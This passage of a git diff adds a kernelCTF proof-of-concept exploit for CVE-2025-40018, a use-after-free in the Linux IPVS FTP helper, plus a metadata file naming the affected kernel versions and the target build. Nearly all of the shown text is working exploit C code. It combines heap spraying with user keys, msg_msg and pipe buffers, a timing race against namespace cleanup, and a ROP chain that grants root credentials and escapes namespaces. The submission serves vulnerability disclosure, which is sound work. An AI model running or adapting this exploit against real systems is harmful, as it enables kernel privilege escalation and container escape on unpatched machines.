=-=-=-=-=-=-=-= +// We use user_key_payload as spray kmalloc-256 object to occupy freed +// victim obj and rewrite app->module to arbitrary address, to get +// arbitrary address decrement primitive by module_put(app->module). +#define USER_KEY_PAYLOAD_SZ 24 +#define KEY_PAYLOAD_SIZE (KMALLOC256_SIZE - USER_KEY_PAYLOAD_SZ) +#define KEY_SPRAY_NUM 40 + +typedef int32_t key_serial_t; + +static inline key_serial_t add_key(const char *type, const char *description, + const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +static inline key_serial_t key_revoke(key_serial_t keyid) +{ + return syscall(__NR_keyctl, KEYCTL_REVOKE, keyid, 0, 0, 0); +} + +char key_desc[KMALLOC256_SIZE]; +char key_payload[KEY_PAYLOAD_SIZE + 1]; +key_serial_t id_buffer[KEY_SPRAY_NUM]; + +static inline void spray_userkey() { + for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) { + snprintf(key_desc, KMALLOC256_SIZE, "SPRAY-RING-%03du", i); + id_buffer[i] = add_key("user", key_desc, key_payload, + KEY_PAYLOAD_SIZE, KEY_SPEC_PROCESS_KEYRING); + if (id_buffer[i] < 0) die("add_key %d", i); + } +} + +static inline void cleanup_userkey() { + for (uint32_t i = 0; i < KEY_SPRAY_NUM; i++) { + if (key_revoke(id_buffer[i]) < 0) die("key_revoke"); + } +} + +// =-=-=-=-=-=-=-= PIPE_BUFFER HELPERS =-=-=-=-=-=-=-= +#define PIPE_BUFFER_SPRAY_NUM 0x100 +int pipe_fds[PIPE_BUFFER_SPRAY_NUM][2]; + +static inline void spray_pipe_buffer() { + for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) { + pipe(pipe_fds[i]); + } +} + +// =-=-=-=-=-=-=-= MSG_MSG HELPERS =-=-=-=-=-=-=-= +#define MSG_SPRAY_NUM_PER_PROCESS 32000 // maximal num of msg_msg queues per ipc ns +#define MSG_SECOND_SPRAY_NUM 2000 +#define MSG_FIRST_SPRAY_NUM (MSG_SPRAY_NUM_PER_PROCESS - MSG_SECOND_SPRAY_NUM) +#define KMALLOC_CG_4K_SZ 0x1000 +#define MSG_MSG_SZ 0x30 +#define MSG_MSG_DATA_SZ (KMALLOC_CG_4K_SZ - MSG_MSG_SZ) +#define KMALLOC_CG_1K_SZ 0x400 +#define MSG_MSGSEG_SZ 8 +#define MSG_MSGSEG_DATA_SZ (KMALLOC_CG_1K_SZ - MSG_MSGSEG_SZ) +#define MSGBUF_SZ (MSG_MSG_DATA_SZ + MSG_MSGSEG_DATA_SZ) +#define SPRAY_PROCESS_NUM 12 + +// After spraying 1.37 GB msg_msg, the msg_msg has +// high probability to be allocated at leak_kheap_base + GUESSED_OFFSET +#define GUESSED_OFFSET 0xa000000 +#define GUESSED_MSG_ADDR (leak_kheap_base + GUESSED_OFFSET) +#define MAGIC_MARKER 0xdeadbeef + +struct msg_buf { + uint64_t mtype; + char mtext[MSGBUF_SZ]; +}; +int *msg_queues; +int *hit; + +// For 3.5 GB RAM system, we spray MSG_FIRST_SPRAY_NUM * SPRAY_PROCESS_NUM +// * KMALLOC_CG_4K_SZ = 1.37 GB msg_msg +void spray_msg(int process_idx) { + struct msg_buf msgbuf; + uint64_t msg_idx; + logd("Creating message queue..."); + for (int i = 0; i < MSG_SPRAY_NUM_PER_PROCESS; i++) { + msg_idx = process_idx*MSG_SPRAY_NUM_PER_PROCESS + i; + msg_queues[msg_idx] = msgget(IPC_PRIVATE, IPC_CREAT | 0666); + if (msg_queues[msg_idx] < 0) + loge("Failed to get message queue"); + } + + memset(&msgbuf, 0, sizeof(msgbuf)); + for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) { + msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i; + msgbuf.mtype = msg_idx + 1; + char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ]; + // Identification for each msg_msgseg + *(uint64_t *)(msg_msgseg_data) = msg_idx; + // MAGIC_MARKER is the oracle of an partial overlap of msg_msgseg + *(uint64_t *)(msg_msgseg_data + 0x100) = MAGIC_MARKER; + *(uint64_t *)(msg_msgseg_data + 0x200) = MAGIC_MARKER; + *(uint64_t *)(msg_msgseg_data + 0x300) = MAGIC_MARKER; + if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0) + loge("Failed to send message"); + } +} + +// Peek every msg_msgseg after a race try. If succeed, fix the timerfd +// timeout count, keep triggering the race to modify the target msg_msg->next +// until it points to another msg_msgseg. Then perform post exploit. +void peek_msg(int process_idx) { + struct msg_buf msgbuf; + uint64_t msg_idx, victim_idx, target_idx; + for (int i = 0; i < MSG_FIRST_SPRAY_NUM; i++) { + msg_idx = process_idx*MSG_SPRAY_NUM_PER_PROCESS + i; + memset(&msgbuf, 0, sizeof(msgbuf)); + if (msgrcv(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, + 0, MSG_COPY | IPC_NOWAIT | MSG_NOERROR) < 0) + loge("Failed to receive message"); + + target_idx = *(uint64_t *)(&msgbuf.mtext[MSG_MSG_DATA_SZ]); + // No overlap, continue + if (target_idx == msg_idx) continue; + + // Partial overlap of msg_msgseg detected, race succeed + if (!*hit) { logs("hit"); *hit = 1; } + // Keep triggering the race to modify the target msg_msg->next + // Until it points to another msg_msgseg. + if (target_idx == 0xdeadbeef) continue; + + // Now we have 2 fully overlapped msg_msgseg, do post exploit + victim_idx = msg_idx; + bind_to_cpu(1); + logs("victim: 0x%lx now overlap with target: 0x%lx", victim_idx, target_idx); + logi("free victim msg_msgseg"); + if (msgrcv(msg_queues[victim_idx], &msgbuf, MSGBUF_SZ, + victim_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0) + loge("Failed to receive message"); + spray_pipe_buffer(); + logi("free target msg_msgseg"); + if (msgrcv(msg_queues[target_idx], &msgbuf, MSGBUF_SZ, + target_idx + 1, IPC_NOWAIT | MSG_NOERROR) < 0) + loge("Failed to receive message"); + + memset(&msgbuf, 0, sizeof(msgbuf)); + #define PIPE_BUFFET_OFFS_OPS 0x10 // pipe_buffer->ops offset + #define PIPE_BUF_OPS_OFFS_RELEASE 0x08 // pipe_buf_operations->release offset + char *msg_msg_data = &msgbuf.mtext[0x0]; + char *msg_msg = msg_msg_data - MSG_MSG_SZ; + char *msg_msgseg_data = &msgbuf.mtext[MSG_MSG_DATA_SZ]; + char *msg_msgseg = msg_msgseg_data - MSG_MSGSEG_SZ; + char *fake_pipe_buffer = msg_msgseg; + + *(uint64_t *)&fake_pipe_buffer[PIPE_BUFFET_OFFS_OPS] = GUESSED_MSG_ADDR + 0x100; // fake_ops + char *fake_ops = msg_msg + 0x100; + *(uint64_t *)&fake_ops[PIPE_BUF_OPS_OFFS_RELEASE] = + PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 + kernel_offset; // pivot gadget + *(uint64_t *)(fake_pipe_buffer + 0x39) = POP_RSP_POP_R15_RET + kernel_offset; // pivot gadget + + // push rsi ; pop rsp ; pop r15 ; --> rsp == rsi + 8 + uint64_t *rop = (uint64_t *)(fake_pipe_buffer + 8); + int i = 0; + rop[i++] = POP_RDI_RET + kernel_offset; // slide gadget + i+=1; // Avoid corrupting fake_pipe_buffer[PIPE_BUFFET_OFFS_OPS] + rop[i++] = POP_RDI_RET + kernel_offset; + rop[i++] = INIT_CRED + kernel_offset; + rop[i++] = POP_R12_POP_RBP_POP_RBX_RET + kernel_offset; // slide gadget + i+=3; // Avoid corrupting fake_pipe_buffer + 0x39 + rop[i++] = COMMIT_CREDS + kernel_offset; + + rop[i++] = POP_RDI_RET + kernel_offset; + rop[i++] = 1; + rop[i++] = FIND_TASK_BY_VPID + kernel_offset; + + rop[i++] = POP_RSI_RET + kernel_offset; + rop[i++] = GUESSED_MSG_ADDR + 0x200 + 0x7f; + rop[i++] = PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f + kernel_offset; + *(uint64_t *)(&msg_msg[0x200]) = POP_RDI_RET + kernel_offset; + rop[i++] = POP_RSI_RET + kernel_offset; + rop[i++] = INIT_NSPROXY + kernel_offset; + rop[i++] = SWITCH_TASK_NAMESPACES + kernel_offset; + + rop[i++] = RET2USERMODE + kernel_offset; + rop[i++] = 0; + rop[i++] = 0; + rsp &= ~0xf; + rsp += 8; + rop[i++] = (uint64_t)win; + rop[i++] = cs; + rop[i++] = rflags; + rop[i++] = rsp; + rop[i++] = ss; + + // Spray msg_msgseg to rewrite pipe_buffer + for (int i = MSG_FIRST_SPRAY_NUM; i < MSG_SPRAY_NUM_PER_PROCESS; i++) { + msg_idx = process_idx * MSG_SPRAY_NUM_PER_PROCESS + i; + msgbuf.mtype = msg_idx + 1; + if (msgsnd(msg_queues[msg_idx], &msgbuf, MSGBUF_SZ, 0) < 0) + loge("Failed to send message"); + } + // Trigger pipe_buffer->ops->release(), rop + for (int i = 0; i < PIPE_BUFFER_SPRAY_NUM; i++) { + close(pipe_fds[i][0]); + close(pipe_fds[i][1]); + } + sleep(1); + loge("exploit failed"); + } +} + +// =-=-=-=-=-=-=-= MAIN =-=-=-=-=-=-=-= +struct ip_vs_svcdest_user { + struct ip_vs_service_user svc; + struct ip_vs_dest_user dest; +} __attribute__((packed)); + +int pipe_fd[2][2]; + +int setup_ipvs() { + bring_interface_up("lo"); + + int tcp_fd = socket(AF_INET, SOCK_STREAM, 0); + if (tcp_fd < 0) die("Failed to create TCP socket"); + + // Add ipvs service + struct ip_vs_service_user ip_vs_service; + memset(&ip_vs_service, 0, sizeof(ip_vs_service)); + ip_vs_service.protocol = IPPROTO_TCP; + ip_vs_service.addr = inet_addr("127.0.0.1"); + ip_vs_service.port = htons(21); // Set to FTP's port + ip_vs_service.timeout = 30 * 60; + memcpy(ip_vs_service.sched_name, "rr", 3); + setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADD, &ip_vs_service, sizeof(ip_vs_service)); + + // Add ipvs destination + struct ip_vs_svcdest_user ip_vs_svcdest; + memset(&ip_vs_svcdest, 0, sizeof(ip_vs_svcdest)); + memcpy(&ip_vs_svcdest.svc, &ip_vs_service, sizeof(ip_vs_service)); + ip_vs_svcdest.dest.addr = inet_addr("127.0.0.1"); + ip_vs_svcdest.dest.port = htons(1337); + ip_vs_svcdest.dest.conn_flags = IP_VS_CONN_F_MASQ; + ip_vs_svcdest.dest.weight = 1; + ip_vs_svcdest.dest.u_threshold = 0; + ip_vs_svcdest.dest.l_threshold = 0; + setsockopt(tcp_fd, SOL_IP, IP_VS_SO_SET_ADDDEST, &ip_vs_svcdest, sizeof(ip_vs_svcdest)); + + // Create FTP connection + struct sockaddr_in backend_addr; + memset(&backend_addr, 0, sizeof(backend_addr)); + backend_addr.sin_family = AF_INET; + backend_addr.sin_port = htons(1337); + backend_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + + int recv_fd = socket(AF_INET, SOCK_STREAM, 0); + if (recv_fd < 0) die("socket"); + if (bind(recv_fd, (struct sockaddr *)&backend_addr, sizeof(backend_addr)) < 0) + die("bind"); + if (listen(recv_fd, 5) < 0) die("listen"); + struct sockaddr_in service_addr; + memset(&service_addr, 0, sizeof(service_addr)); + service_addr.sin_family = AF_INET; + service_addr.sin_port = htons(21); + service_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); + if (connect(tcp_fd, (struct sockaddr *)&service_addr, sizeof(service_addr)) < 0) + die("connect"); + const char *msg = "AAAA"; + // Sendmsg to new ip_vs_conn, with cp->app->app == victim + if (send(tcp_fd, msg, strlen(msg)+1, 0) < 0) + die("send"); + close(tcp_fd); + close(recv_fd); +} + +static void *busy_waiting(void *arg) { + uint64_t core = (uint64_t )arg; + bind_to_cpu(core); + while(1); +} + +static inline void set_dec_addr(uint64_t target) { + char *user_key_payload = key_payload - USER_KEY_PAYLOAD_SZ; + char *fake_ip_vs_app = user_key_payload; + #define IP_VS_APP_OFFSETS_MODULE 40 // ip_vs_app->module offsets + #define MODULE_OFFSETS_REFCNT 832 // module->refcnt offsets + *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT; +} + +void *spray_job(void *arg) { + char signal; + bind_to_cpu(1); + while (1) { + barrier(&barr); + + struct timespec ts = {.tv_nsec = count }; + nanosleep(&ts, NULL); + spray_userkey(); + barrier(&barr); + + cleanup_userkey(); + barrier(&barr); + } +} + +typedef struct { + sem_t child_sem; + sem_t parent_sem; +} shared_sems; + +int main(int argc, char *argv[]) { + save_status(); + // EntryBleed + leak(); + + // Initialize shared data + shared_sems *shared = mmap(NULL, sizeof(shared_sems), PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (shared == MAP_FAILED) die("mmap"); + if (sem_init(&shared->child_sem, 1, 0) < 0) die("sem_init"); + if (sem_init(&shared->parent_sem, 1, 0) < 0) die("sem_init"); + + hit = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (hit == MAP_FAILED) die("mmap"); + + msg_queues = mmap(NULL, sizeof(int)*MSG_SPRAY_NUM_PER_PROCESS*SPRAY_PROCESS_NUM, + PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (msg_queues == MAP_FAILED) die("mmap"); + + // Fork childs for spraying msg_msg + int pid[SPRAY_PROCESS_NUM]; + for (int i = 0; i < SPRAY_PROCESS_NUM; i++) { + pid[i] = fork(); + if (!pid[i]) { + setup_namespace(); + bind_to_cpu(1); + spray_msg(i); + while(1) { + sem_post(&shared->child_sem); + sched_yield(); + sem_wait(&shared->parent_sem); + peek_msg(i); + } + } + } + + setup_namespace(); + struct rlimit rlim = { .rlim_cur = 0xf000, .rlim_max = 0xf000 }; + setrlimit(RLIMIT_NOFILE, &rlim); + + // Use infinite loop threads to occupy CPUs except #0, increase the + // possibility that kernel schedules net_cleanup_work to CPU #0 + #define BUSY_WAITING_THREADS 1 + ncpus = sysconf(_SC_NPROCESSORS_CONF); + pthread_t tid[ncpus][BUSY_WAITING_THREADS]; + uint64_t args[ncpus]; + for (int i = 1; i < ncpus; i++) { + args[i] = i; + for (int j = 0; j < BUSY_WAITING_THREADS; j++) { + pthread_create(&tid[i][j], 0, busy_waiting, (void *)args[i]); + } + } + + tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + do_epoll_enqueue(tfd, 17); + + char signal; + pipe(pipe_fd[0]); + pipe(pipe_fd[1]); + + bind_to_cpu(1); + pthread_barrier_init(&barr, NULL, 2); + pthread_t tid_spray_userkey; + pthread_create(&tid_spray_userkey, 0, spray_job, NULL); + + // The count to hit the race window, depends on CPU. + // The range is chosen based on experiment for Github Action environment. + #define TIMERFD_COUNT_START 35645000 + #define TIMERFD_COUNT_END 35733000 + count = TIMERFD_COUNT_START; + // Boost next round try in PR verification workflow after 6 mins + alarm(360); + while (1) { + for (int i = 0; i < SPRAY_PROCESS_NUM; i++) { + sem_wait(&shared->child_sem); + } + + struct itimerspec new = { .it_value.tv_nsec = count }; + logd("count:%010d", count); + if (!(*hit)) { + count += 1000; + if (count > TIMERFD_COUNT_END) + count = TIMERFD_COUNT_START; + } + + #define MSG_MSG_NEXT_OFFSET 0x20 // msg_msg->next offset + set_dec_addr(GUESSED_MSG_ADDR + MSG_MSG_NEXT_OFFSET + 1); + // Set *(msg_msg->next + 1) -= 1 by arbitrary decrement primitive, + // so msg_msg->next -= 0x100; + + if (!fork()) { + bind_to_cpu(1); + + write(pipe_fd[0][1], &signal, 1); + read(pipe_fd[1][0], &signal, 1); + // victim ip_vs_app (ip_vs_ftp) is allocated here + if (unshare(CLONE_NEWNET)) die("unshare(CLONE_NEWNET)"); + + write(pipe_fd[0][1], &signal, 1); + read(pipe_fd[1][0], &signal, 1); + // Switch CPU to reduce noise + bind_to_cpu(0); + setup_ipvs(); + bind_to_cpu(1); + + write(pipe_fd[0][1], &signal, 1); + read(pipe_fd[1][0], &signal, 1); + return 0; // Schedule net_cleanup_work + } + + read(pipe_fd[0][0], &signal, 1); + spray_pg_vec_and_create_slots(); + write(pipe_fd[1][1], &signal, 1); + // Child: unshare(CLONE_NEWNET) to allocate victim + read(pipe_fd[0][0], &signal, 1); + freeze_victim_slab(); + write(pipe_fd[1][1], &signal, 1); + + read(pipe_fd[0][0], &signal, 1); + // Set timer on CPU #0 and start racing + bind_to_cpu(0); + timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL); + bind_to_cpu(1); + write(pipe_fd[1][1], &signal, 1); + barrier(&barr); + + usleep(100000); // Wait for ns cleanup to finish + barrier(&barr); + + clean_up_pg_vec(); + barrier(&barr); + + for (int i = 0; i < SPRAY_PROCESS_NUM; i++) + sem_post(&shared->parent_sem); // notice childs to check if race succeed + } + + return 0; +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json new file mode 100644 index 000000000..276a114e9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp416"], + "vulnerability": { + "summary": "IPVS FTP helper Use-After-Free during network namespace cleanup", + "cve": "CVE-2025-40018", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821", + "affected_versions": ["2.6.39 - 6.18"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_IP_VS", + "CONFIG_IP_VS_FTP" + ] + } + }, + "exploits":{ + "cos-113-18244.448.33": { + "uses": ["userns"], + "requires_separate_kaslr_leak": false, + "stability_notes": "3 ~ 4 times success per 10 times run" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz new file mode 100755 index 000000000..d06d359cc Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/original.tar.gz differ